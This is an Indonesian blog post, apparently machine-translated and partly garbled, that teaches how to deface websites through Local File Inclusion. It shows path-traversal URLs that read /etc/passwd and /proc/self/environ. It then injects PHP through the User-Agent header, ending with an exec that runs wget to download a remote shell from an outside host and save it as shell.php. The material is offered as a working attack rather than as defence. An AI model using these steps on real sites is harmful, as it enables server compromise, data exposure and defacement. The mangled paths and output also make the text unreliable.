tutorial defencer situs LFI DENGAN TAMPAR DATAtutorial defencer situs LFI DENGAN TAMPAR DATA

Wednesday, April 10, 2013

tutorial defencer situs LFI DENGAN TAMPAR DATA

Apa itu LFI?

LFI (Local File Inclusion) Serangan terjadi di aplikasi web ketika parameter tidak diperiksa dengan benar dan diperiksa sebelum digunakan untuk menyertakan file. Dengan kerentanan ini aliran Penyerang dapat melihat file sewenang-wenang pada direktori dan bahkan bisa deface situs dengan mengupload Shell dengan ini mengalir di atas.Hal Diperlukan


LFI situs RentanUser-Agent Switcher (https://addons.mozilla.org/en-US/firefox...-switcher/) atau u juga dapat menggunakan tamperdata (https://addons.mozilla.org/en-US/firefox. .. per-data /)Sebuah remote shellOk jadi mari kita mulai


Menemukan LFI Situs Rentan

Sekarang kita akan menemukan File Inclusion website.So rentan lokal kami menemukan target kami, mari kita periksa itu.
http://www.website.com/view.php?page=contact.php
Sekarang mari kita mengganti contact.php dengan .. / sehingga URL akan menjadi
http://www.website.com/view.php?page=../dan kami punya kesalahan
Warning: include (.. /) [function.include]: failed to open stream: Tidak ada berkas atau direktori / home / sirgod / public_html / website.com / view.php on line 1337
Hal ini menunjukkan bahwa mungkin ada kerentanan di situs target kami.

Memeriksa etc / passwd untuk memeriksa apakah target rentan atau tidak

http://www.website.com/view.php?page=../...etc/passwd
kita punya kesalahan dan tidak ada etc / passwdWarning: include (.. /) [function.include]: failed to open stream: Tidak ada berkas atau direktori / home / sirgod / public_html / website.com / view.php on line 1337

jadi kami pergi lebih direktori up
http://www.website.com/view.php?page=../...etc/passwd
kami berhasil termasuk etc / passwd dan kita pergi hasil seperti ini:

root: x: 00:00: root :/ akar :/ bin / bash bin: x: 1:1: bin :/ bin :/ sbin / nologin daemon: x: 02:02: daemon :/ sbin :/ sbin / Nologin adm: x: 03:04: adm :/ var / adm :/ sbin / nologin lp: x: 04:07: lp :/ var / spool / lpd sbin :/ / Nologin sync: x: 05:00: sync :/ sbin :/ bin / sync shutdown: x: 6:0: shutdown :/ sbin :/ sbin / shutdown berhenti: x: 7:0: halt :/ sbin :/ sbin / halt mail: x: 8:12: email :/ var / spool / mail :/ sbin / NologinBerita: x: 09:13: news :/ etc / news: uucp: x: 10:14: uucp :/ var / spool / uucp sbin / Nologin Operator :/: x: 11:00: Operator :/ :/ akar sbin / nologin games: x: 12:100: games :/ usr / games :/ sbin / nologin test: x: 13:30: test :/ var / test :/ sbin / Nologin ftp:x:14:50:FTPPengguna :/ var / ftp :/ sbin / Nologintidak ada: x: 99:99: Nobody :/ :/ sbin / Nologin
Memeriksa apakah proc / self / environ dapat diakses

Sekarang mari kita lihat apakah proc / self / environ yang accessible.We menggantikan etc / passwd dengan proc / self / environ
http://www.website.com/view.php?page=../...lf/environ
Jika Anda mendapatkan sesuatu seperti
DOCUMENT_ROOT = / home / sirgod / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT = text / html, application / xml; q = 0,9, aplikasi / xhtml + xml, image / png, image / jpeg, image / gif,image / x-xbitmap,* / *; Q = 0,1 HTTP_COOKIE = PHPSESSID = 134cc7261b341231b9594844ac2ad7ac HTTP_HOST = www.website.com HTTP_REFERER = http://www.website.com/index.php?view=../../../../. . / / etc / passwd HTTP_USER_AGENT = Opera/9.80 (Windows NT 5.1; U; en).. Presto/2.2.15 Version/10.00 PATH = / bin :/ usr / bin QUERY_STRING = view = ..% 2F ..% 2F% 2Fproc% 2Fself% 2Fenviron REDIRECT_STATUS = 200 REMOTE_ADDR = 6x.1xx.4x.1xx REMOTE_PORT = 35.665 REQUEST_METHOD = GET = / index.php? pandangan 2F ..% 2F ..% 2F ..% .. REQUEST_URI = .. % 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron SCRIPT_FILENAME = / home / sirgod / public_html / index.php SCRIPT_NAME = / index.php SERVER_ADDR = 1xx.1xx. 1xx.6x SERVER_ADMIN = webmaster@website.com SERVER_NAME = www.website.com SERVER_PORT = 80 SERVER_PROTOCOL = HTTP/1.0 SERVER_SIGNATURE =Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV / 2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server di http://www.website.com Port 80proc / self / environ adalah accessible.If Anda punya sebuah halaman kosong, sebuah proc error / self / environ tidak dapat diakses atau OS FreeBSD.
Menyuntikkan kode berbahaya dan Mengupload Shell

Sekarang mari kita menyuntikkan kode berbahaya kita di proc / self / environ.How kita bisa melakukan itu? Kita bisa menyuntikkan kode kita di User-Agent HTTP header
Untuk itu pertama-tama download User-Agent Switcher dan Buka dan klik pada baru> New User-Agent atau Anda juga dapat menggunakan Tamperdata







Setelah membuka New User Agent di User Agent ganti dengan"<? Php phpinfo ();?>" Tanpa tanda kutipDan memberikan gambaran apa pun yang Anda sukai dan klik Ok kemudian refresh halaman Anda akan mendapatkan file Info PHP terbuka di Tab.




Sekarang lagi pergi ke pengguna Agen dan mengganti User Agent dengan <exec ('wget http://www.sh3ll.org/egy.txt-O shell.php');?> Dan klik ok.
(Http://www.sh3ll.org/egy.txt Anda dapat menempatkan Anda shell hubungan jarak jauh nad-O akan mengubah shell di shell.php)
Sekarang kita telah berhasil diupload shell di situs. Anda akan mendapatkan shell link seperti ini
http://www.website.com/shell.php

bisa di lihat tutoril video nya http://www.youtube.com/watch?feature=player_embedded&v=9MX2aqp7TfY

0 comments:

Post a Comment

pendapat ada tentang blog ini ?

 
bloger hat © 2013 Templates | imamkenteng